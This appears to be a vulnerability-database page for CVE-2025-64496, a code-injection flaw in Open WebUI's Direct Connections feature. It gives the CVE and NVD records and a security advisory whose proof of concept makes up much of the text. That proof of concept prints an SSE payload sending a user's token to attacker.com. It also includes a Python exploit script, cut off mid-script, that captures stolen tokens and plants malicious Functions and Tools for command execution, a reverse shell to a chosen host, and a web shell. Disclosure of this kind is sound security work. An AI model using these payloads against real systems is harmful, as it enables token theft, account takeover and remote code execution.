CVE-2025-64496 (GCVE-0-2025-64496)
Vulnerability from cvelistv5 – Published: 2025-11-08 01:29 – Updated: 2025-11-13 21:37
VLAI?
Summary
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Versions 0.6.224 and prior contain a code injection vulnerability in the Direct Connections feature that allows malicious external model servers to execute arbitrary JavaScript in victim browsers via Server-Sent Event (SSE) execute events. This leads to authentication token theft, complete account takeover, and when chained with the Functions API, enables remote code execution on the backend server. The attack requires the victim to enable Direct Connections (disabled by default) and add the attacker's malicious model URL, achievable through social engineering of the admin and subsequent users. This issue is fixed in version 0.6.35.
Severity ?
7.3 (High)
CWE
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| open-webui | open-webui |
Affected:
< 0.6.35
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-64496",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-11-13T21:37:56.285429Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-13T21:37:59.663Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-cm35-v4vp-5xvx"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "open-webui",
"vendor": "open-webui",
"versions": [
{
"status": "affected",
"version": "\u003c 0.6.35"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Versions 0.6.224 and prior contain a code injection vulnerability in the Direct Connections feature that allows malicious external model servers to execute arbitrary JavaScript in victim browsers via Server-Sent Event (SSE) execute events. This leads to authentication token theft, complete account takeover, and when chained with the Functions API, enables remote code execution on the backend server. The attack requires the victim to enable Direct Connections (disabled by default) and add the attacker\u0027s malicious model URL, achievable through social engineering of the admin and subsequent users. This issue is fixed in version 0.6.35."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-95",
"description": "CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (\u0027Eval Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-829",
"description": "CWE-829: Inclusion of Functionality from Untrusted Control Sphere",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-830",
"description": "CWE-830: Inclusion of Web Functionality from an Untrusted Source",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-501",
"description": "CWE-501: Trust Boundary Violation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-08T01:29:02.654Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/open-webui/open-webui/security/advisories/GHSA-cm35-v4vp-5xvx",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-cm35-v4vp-5xvx"
},
{
"name": "https://github.com/open-webui/open-webui/commit/8af6a4cf21b756a66cd58378a01c60f74c39b7ca",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/open-webui/open-webui/commit/8af6a4cf21b756a66cd58378a01c60f74c39b7ca"
}
],
"source": {
"advisory": "GHSA-cm35-v4vp-5xvx",
"discovery": "UNKNOWN"
},
"title": "Open WebUI Affected by an External Model Server (Direct Connections) Code Injection via SSE Events"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-64496",
"datePublished": "2025-11-08T01:29:02.654Z",
"dateReserved": "2025-11-05T19:12:25.103Z",
"dateUpdated": "2025-11-13T21:37:59.663Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-64496\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-11-08T02:15:35.443\",\"lastModified\":\"2025-11-26T15:36:09.183\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Versions 0.6.224 and prior contain a code injection vulnerability in the Direct Connections feature that allows malicious external model servers to execute arbitrary JavaScript in victim browsers via Server-Sent Event (SSE) execute events. This leads to authentication token theft, complete account takeover, and when chained with the Functions API, enables remote code execution on the backend server. The attack requires the victim to enable Direct Connections (disabled by default) and add the attacker\u0027s malicious model URL, achievable through social engineering of the admin and subsequent users. This issue is fixed in version 0.6.35.\"},{\"lang\":\"es\",\"value\":\"Open WebUI es una plataforma de inteligencia artificial autoalojada dise\u00f1ada para operar completamente sin conexi\u00f3n. Las versiones 0.6.224 y anteriores contienen una vulnerabilidad de inyecci\u00f3n de c\u00f3digo en la funci\u00f3n de Conexiones Directas que permite a servidores de modelos externos maliciosos ejecutar JavaScript arbitrario en los navegadores de las v\u00edctimas a trav\u00e9s de eventos de ejecuci\u00f3n de Server-Sent Event (SSE). Esto conduce al robo de tokens de autenticaci\u00f3n, a la toma de control completa de la cuenta y, cuando se encadena con la API de Funciones, permite la ejecuci\u00f3n remota de c\u00f3digo en el servidor backend. El ataque requiere que la v\u00edctima habilite las Conexiones Directas (deshabilitadas por defecto) y a\u00f1ada la URL del modelo malicioso del atacante, lo cual se puede lograr mediante ingenier\u00eda social del administrador y usuarios posteriores. Este problema est\u00e1 solucionado en la versi\u00f3n 0.6.35.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N\",\"baseScore\":7.3,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.1,\"impactScore\":5.2},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":8.0,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.1,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-95\"},{\"lang\":\"en\",\"value\":\"CWE-501\"},{\"lang\":\"en\",\"value\":\"CWE-829\"},{\"lang\":\"en\",\"value\":\"CWE-830\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.6.35\",\"matchCriteriaId\":\"E8274E63-8712-4A92-9161-E5D5EC241CD4\"}]}]}],\"references\":[{\"url\":\"https://github.com/open-webui/open-webui/commit/8af6a4cf21b756a66cd58378a01c60f74c39b7ca\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-cm35-v4vp-5xvx\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-cm35-v4vp-5xvx\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-64496\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-11-13T21:37:56.285429Z\"}}}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-cm35-v4vp-5xvx\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-11-13T21:37:49.829Z\"}}], \"cna\": {\"title\": \"Open WebUI Affected by an External Model Server (Direct Connections) Code Injection via SSE Events\", \"source\": {\"advisory\": \"GHSA-cm35-v4vp-5xvx\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"open-webui\", \"product\": \"open-webui\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.6.35\"}]}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-cm35-v4vp-5xvx\", \"name\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-cm35-v4vp-5xvx\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/open-webui/open-webui/commit/8af6a4cf21b756a66cd58378a01c60f74c39b7ca\", \"name\": \"https://github.com/open-webui/open-webui/commit/8af6a4cf21b756a66cd58378a01c60f74c39b7ca\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Versions 0.6.224 and prior contain a code injection vulnerability in the Direct Connections feature that allows malicious external model servers to execute arbitrary JavaScript in victim browsers via Server-Sent Event (SSE) execute events. This leads to authentication token theft, complete account takeover, and when chained with the Functions API, enables remote code execution on the backend server. The attack requires the victim to enable Direct Connections (disabled by default) and add the attacker\u0027s malicious model URL, achievable through social engineering of the admin and subsequent users. This issue is fixed in version 0.6.35.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-95\", \"description\": \"CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (\u0027Eval Injection\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-829\", \"description\": \"CWE-829: Inclusion of Functionality from Untrusted Control Sphere\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-830\", \"description\": \"CWE-830: Inclusion of Web Functionality from an Untrusted Source\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-501\", \"description\": \"CWE-501: Trust Boundary Violation\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-11-08T01:29:02.654Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-64496\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-13T21:37:59.663Z\", \"dateReserved\": \"2025-11-05T19:12:25.103Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-11-08T01:29:02.654Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2025-64496
Vulnerability from fkie_nvd - Published: 2025-11-08 02:15 - Updated: 2025-11-26 15:36
Severity ?
7.3 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
8.0 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
8.0 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
Summary
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Versions 0.6.224 and prior contain a code injection vulnerability in the Direct Connections feature that allows malicious external model servers to execute arbitrary JavaScript in victim browsers via Server-Sent Event (SSE) execute events. This leads to authentication token theft, complete account takeover, and when chained with the Functions API, enables remote code execution on the backend server. The attack requires the victim to enable Direct Connections (disabled by default) and add the attacker's malicious model URL, achievable through social engineering of the admin and subsequent users. This issue is fixed in version 0.6.35.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| openwebui | open_webui | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E8274E63-8712-4A92-9161-E5D5EC241CD4",
"versionEndExcluding": "0.6.35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Versions 0.6.224 and prior contain a code injection vulnerability in the Direct Connections feature that allows malicious external model servers to execute arbitrary JavaScript in victim browsers via Server-Sent Event (SSE) execute events. This leads to authentication token theft, complete account takeover, and when chained with the Functions API, enables remote code execution on the backend server. The attack requires the victim to enable Direct Connections (disabled by default) and add the attacker\u0027s malicious model URL, achievable through social engineering of the admin and subsequent users. This issue is fixed in version 0.6.35."
},
{
"lang": "es",
"value": "Open WebUI es una plataforma de inteligencia artificial autoalojada dise\u00f1ada para operar completamente sin conexi\u00f3n. Las versiones 0.6.224 y anteriores contienen una vulnerabilidad de inyecci\u00f3n de c\u00f3digo en la funci\u00f3n de Conexiones Directas que permite a servidores de modelos externos maliciosos ejecutar JavaScript arbitrario en los navegadores de las v\u00edctimas a trav\u00e9s de eventos de ejecuci\u00f3n de Server-Sent Event (SSE). Esto conduce al robo de tokens de autenticaci\u00f3n, a la toma de control completa de la cuenta y, cuando se encadena con la API de Funciones, permite la ejecuci\u00f3n remota de c\u00f3digo en el servidor backend. El ataque requiere que la v\u00edctima habilite las Conexiones Directas (deshabilitadas por defecto) y a\u00f1ada la URL del modelo malicioso del atacante, lo cual se puede lograr mediante ingenier\u00eda social del administrador y usuarios posteriores. Este problema est\u00e1 solucionado en la versi\u00f3n 0.6.35."
}
],
"id": "CVE-2025-64496",
"lastModified": "2025-11-26T15:36:09.183",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 5.2,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2025-11-08T02:15:35.443",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/open-webui/open-webui/commit/8af6a4cf21b756a66cd58378a01c60f74c39b7ca"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-cm35-v4vp-5xvx"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-cm35-v4vp-5xvx"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-95"
},
{
"lang": "en",
"value": "CWE-501"
},
{
"lang": "en",
"value": "CWE-829"
},
{
"lang": "en",
"value": "CWE-830"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-CM35-V4VP-5XVX
Vulnerability from github – Published: 2025-11-07 17:37 – Updated: 2025-11-15 02:10
VLAI?
Summary
Open WebUI Affected by an External Model Server (Direct Connections) Code Injection via SSE Events
Details
Summary
Open WebUI v0.6.33 and below contains a code injection vulnerability in the Direct Connections feature that allows malicious external model servers to execute arbitrary JavaScript in victim browsers via Server-Sent Event (SSE) execute events. This leads to authentication token theft, complete account takeover, and when chained with the Functions API, enables remote code execution on the backend server. The attack requires the victim to enable Direct Connections (disabled by default) and add the attacker's malicious model URL, achievable through social engineering of the admin and subsequent users.
Details
ROOT CAUSE ANALYSIS:
Open WebUI's Direct Connections feature allows users to add external OpenAI-compatible model servers without proper validation of the Server-Sent Events (SSE) these servers emit.
VULNERABLE COMPONENT: Frontend SSE Event Handler
The frontend JavaScript code processes SSE events from external servers and specifically
handles an execute event type that triggers arbitrary JavaScript execution:
// Approximate vulnerable code location (frontend SSE handler) if (event.type === 'execute') { const func = new Function(event.data.code); // CRITICAL: Unsafe code execution await func(); }
VULNERABILITY DETAILS:
- No validation of external server trustworthiness
- No allowlist of trusted model providers
- No event type whitelisting or filtering
- Direct execution of code from
executeevents usingnew Function() - No sandboxing or Content Security Policy enforcement
- Full browser context access (localStorage, cookies, DOM)
ATTACK VECTOR:
- Attacker deploys malicious OpenAI-compatible API server
- Social engineering: "Try my free GPT-4 alternative at http://attacker.com:8000"
- Victim enables Direct Connections (Admin Settings → Connections)
- Victim adds attacker's URL as external connection
- Victim sends ANY message to the malicious model
- Malicious server responds with SSE stream including:
data: {"event": {"type": "execute", "data": {"code": "fetch('http://attacker.com/steal?t=' + localStorage.token)"}}}
- Frontend executes the malicious code via
new Function() - JWT token exfiltrated to attacker's server
- Token is valid permanently (expires_at: null)
EXPLOITATION EVIDENCE:
Tested on Open WebUI v0.6.33 (2025-10-08):
- Token successfully captured in < ~5 seconds
- Admin token obtained with full privileges
- Token format: JWT stored in localStorage
- Token validation confirmed via /api/v1/users/user/info](http://localhost:3000/api/v1/auths/
CWE CLASSIFICATIONS:
Primary: - CWE-829: Inclusion of Functionality from Untrusted Control Sphere - CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code
Secondary: - CWE-830: Inclusion of Web Functionality from an Untrusted Source - CWE-501: Trust Boundary Violation - CWE-522: Insufficiently Protected Credentials (token in localStorage)
CHAINED IMPACT:
When admin token is stolen, attacker can exploit Functions API to achieve RCE on backend server (see separate report for Functions/Tools vulnerability).
PoC
PROOF OF CONCEPT - COMPLETE REPRODUCTION
PREREQUISITES: - Open WebUI v0.6.33 running (tested version) - Node.js v18+ for malicious server - Python 3.8+ for token listener
ENVIRONMENT SETUP:
For Docker deployment:
Clone the repository Open WebUI v0.6.33 and run docker compose up
EXPLOITATION STEPS:
Step 1: Create Malicious Model Server (malicious-server.js)
#!/usr/bin/env python3
"""
Open WebUI - Automated Token Capture to RCE
============================================
ALL-IN-ONE EXPLOIT - Captures token and immediately achieves RCE
This script demonstrates how quickly an attacker can go from
token theft to full server compromise.
Usage:
python3 auto_exploit.py # Auto RCE (via Functions)
python3 auto_exploit.py --tool # Use Tools API instead
python3 auto_exploit.py --shell HOST PORT # Reverse shell
LAB ENVIRONMENT ONLY
"""
import http.server
import socketserver
import threading
import requests
import json
import sys
import time
import argparse
from urllib.parse import urlparse, parse_qs
from datetime import datetime
# Configuration
EXFIL_PORT = 8081
OPEN_WEBUI_URL = 'http://localhost:3000'
# Global state
captured_token = None
token_received = threading.Event()
class Colors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
class TokenCaptureHandler(http.server.SimpleHTTPRequestHandler):
"""HTTP handler that captures tokens and triggers immediate exploitation"""
def log_message(self, format, *args):
pass # Suppress default logging
def do_GET(self):
global captured_token
parsed = urlparse(self.path)
query_params = parse_qs(parsed.query)
if 'token' in query_params:
token = query_params['token'][0]
timestamp = datetime.now().strftime('%H:%M:%S')
print(f"\n{Colors.OKGREEN}{'='*60}{Colors.ENDC}")
print(f"{Colors.OKGREEN}{Colors.BOLD}[{timestamp}] TOKEN CAPTURED!{Colors.ENDC}")
print(f"{Colors.OKGREEN}{'='*60}{Colors.ENDC}")
print(f"{Colors.OKBLUE}[*] Token length: {len(token)} chars{Colors.ENDC}")
print(f"{Colors.OKBLUE}[*] Source: {self.client_address[0]}{Colors.ENDC}")
captured_token = token
token_received.set() # Signal that token is ready
# Send response
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.send_header('Access-Control-Allow-Origin', '*')
self.end_headers()
self.wfile.write(json.dumps({'status': 'received'}).encode())
def do_OPTIONS(self):
"""Handle CORS preflight"""
self.send_response(200)
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
self.send_header('Access-Control-Allow-Headers', 'Content-Type')
self.end_headers()
def start_listener():
"""Start the token capture listener in background thread"""
Handler = TokenCaptureHandler
with socketserver.TCPServer(("", EXFIL_PORT), Handler) as httpd:
httpd.serve_forever()
def verify_token(token):
"""Verify token is valid"""
try:
response = requests.get(
f'{OPEN_WEBUI_URL}/api/v1/users/user/info',
headers={'Authorization': f'Bearer {token}'},
timeout=5
)
return response.status_code == 200
except:
return False
def create_command_execution(token, command):
"""Create a function that executes a command"""
timestamp = datetime.now().strftime('%H:%M:%S')
print(f"\n{Colors.WARNING}[{timestamp}] Weaponizing token...{Colors.ENDC}")
malicious_code = f'''"""
title: Auto Exploit
"""
import subprocess
import sys
class Pipe:
def __init__(self):
try:
result = subprocess.check_output(
{repr(command)},
shell=True,
stderr=subprocess.STDOUT,
text=True,
timeout=30
)
print(f"[AUTO_EXPLOIT_OUTPUT]\\n{{result}}", file=sys.stderr)
except Exception as e:
print(f"[AUTO_EXPLOIT_ERROR] {{e}}", file=sys.stderr)
def pipe(self, body: dict) -> dict:
return body
'''
payload = {
"id": f"auto_exploit_{int(time.time())}",
"name": "Auto Exploit",
"content": malicious_code,
"meta": {"description": "Automated exploitation", "manifest": {}}
}
headers = {
'Authorization': f'Bearer {token}',
'Content-Type': 'application/json'
}
try:
response = requests.post(
f'{OPEN_WEBUI_URL}/api/v1/functions/create',
headers=headers,
json=payload,
timeout=30
)
if response.status_code == 200:
return True
else:
print(f"{Colors.FAIL}[!] RCE failed: {response.status_code}{Colors.ENDC}")
print(f"{Colors.FAIL}[!] {response.text}{Colors.ENDC}")
return False
except Exception as e:
print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
return False
def create_reverse_shell(token, host, port):
"""Create a function that spawns reverse shell"""
timestamp = datetime.now().strftime('%H:%M:%S')
print(f"\n{Colors.WARNING}[{timestamp}] Creating reverse shell...{Colors.ENDC}")
malicious_code = f'''"""
title: Reverse Shell
"""
import socket
import subprocess
import os
import sys
import threading
class Pipe:
def __init__(self):
def connect():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("{host}", {port}))
# Duplicate file descriptors
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# Spawn shell
subprocess.call(["/bin/sh", "-i"])
except Exception as e:
print(f"[SHELL_ERROR] {{e}}", file=sys.stderr)
# Run in background thread to avoid blocking
threading.Thread(target=connect, daemon=True).start()
def pipe(self, body: dict) -> dict:
return body
'''
payload = {
"id": f"revshell_{int(time.time())}",
"name": "Reverse Shell",
"content": malicious_code,
"meta": {"description": "Reverse shell", "manifest": {}}
}
headers = {
'Authorization': f'Bearer {token}',
'Content-Type': 'application/json'
}
try:
response = requests.post(
f'{OPEN_WEBUI_URL}/api/v1/functions/create',
headers=headers,
json=payload,
timeout=30
)
if response.status_code == 200:
return True
else:
print(f"{Colors.FAIL}[!] Shell creation failed: {response.status_code}{Colors.ENDC}")
return False
except Exception as e:
print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
return False
def create_interactive_shell_function(token):
"""Create a web-based command execution function"""
timestamp = datetime.now().strftime('%H:%M:%S')
print(f"\n{Colors.WARNING}[{timestamp}] Creating interactive shell handler...{Colors.ENDC}")
malicious_code = '''"""
title: Web Shell
"""
import subprocess
import sys
class Pipe:
def __init__(self):
pass
def pipe(self, body: dict) -> dict:
"""Execute commands from pipe input"""
if 'messages' in body and len(body['messages']) > 0:
last_message = body['messages'][-1]
if 'content' in last_message:
cmd = last_message['content']
# Check for shell command prefix
if cmd.startswith('!shell '):
command = cmd[7:] # Remove '!shell ' prefix
try:
result = subprocess.check_output(
command,
shell=True,
stderr=subprocess.STDOUT,
text=True,
timeout=30
)
# Inject result into response
body['messages'].append({
'role': 'assistant',
'content': f'```\\n{result}\\n```'
})
except Exception as e:
body['messages'].append({
'role': 'assistant',
'content': f'Error: {str(e)}'
})
return body
'''
payload = {
"id": f"webshell_{int(time.time())}",
"name": "Web Shell",
"content": malicious_code,
"meta": {"description": "Interactive web shell", "manifest": {}}
}
headers = {
'Authorization': f'Bearer {token}',
'Content-Type': 'application/json'
}
try:
response = requests.post(
f'{OPEN_WEBUI_URL}/api/v1/functions/create',
headers=headers,
json=payload,
timeout=30
)
if response.status_code == 200:
# Enable the function
function_id = response.json().get('id')
requests.post(
f'{OPEN_WEBUI_URL}/api/v1/functions/id/{function_id}/toggle',
headers=headers,
timeout=10
)
return True
else:
return False
except Exception as e:
print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
return False
# ============================================================================
# TOOLS API EXPLOITATION (Alternative to Functions API)
# Both vulnerable via exec() in plugin.py:101
# ============================================================================
def create_tool_command_execution(token, command):
"""Create a Tool that executes a command (via Tools API)"""
timestamp = datetime.now().strftime('%H:%M:%S')
print(f"\n{Colors.WARNING}[{timestamp}] Weaponizing token via Tools API...{Colors.ENDC}")
malicious_code = f'''"""
title: Auto Exploit Tool
"""
import subprocess
import sys
class Tools:
def __init__(self):
try:
result = subprocess.check_output(
{repr(command)},
shell=True,
stderr=subprocess.STDOUT,
text=True,
timeout=30
)
print(f"[AUTO_EXPLOIT_TOOL_OUTPUT]\\n{{result}}", file=sys.stderr)
except Exception as e:
print(f"[AUTO_EXPLOIT_TOOL_ERROR] {{e}}", file=sys.stderr)
'''
payload = {
"id": f"auto_tool_{int(time.time())}",
"name": "Auto Exploit Tool",
"content": malicious_code,
"meta": {"description": "Automated exploitation via Tools", "manifest": {}}
}
headers = {
'Authorization': f'Bearer {token}',
'Content-Type': 'application/json'
}
try:
response = requests.post(
f'{OPEN_WEBUI_URL}/api/v1/tools/create',
headers=headers,
json=payload,
timeout=30
)
if response.status_code == 200:
return True
else:
print(f"{Colors.FAIL}[!] Tool RCE failed: {response.status_code}{Colors.ENDC}")
print(f"{Colors.FAIL}[!] {response.text}{Colors.ENDC}")
return False
except Exception as e:
print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
return False
def create_tool_reverse_shell(token, host, port):
"""Create a Tool that spawns reverse shell"""
timestamp = datetime.now().strftime('%H:%M:%S')
print(f"\n{Colors.WARNING}[{timestamp}] Creating reverse shell via Tools API...{Colors.ENDC}")
malicious_code = f'''"""
title: Reverse Shell Tool
"""
import socket
import subprocess
import os
import sys
import threading
class Tools:
def __init__(self):
def connect():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("{host}", {port}))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
subprocess.call(["/bin/sh", "-i"])
except Exception as e:
print(f"[TOOL_SHELL_ERROR] {{e}}", file=sys.stderr)
threading.Thread(target=connect, daemon=True).start()
'''
payload = {
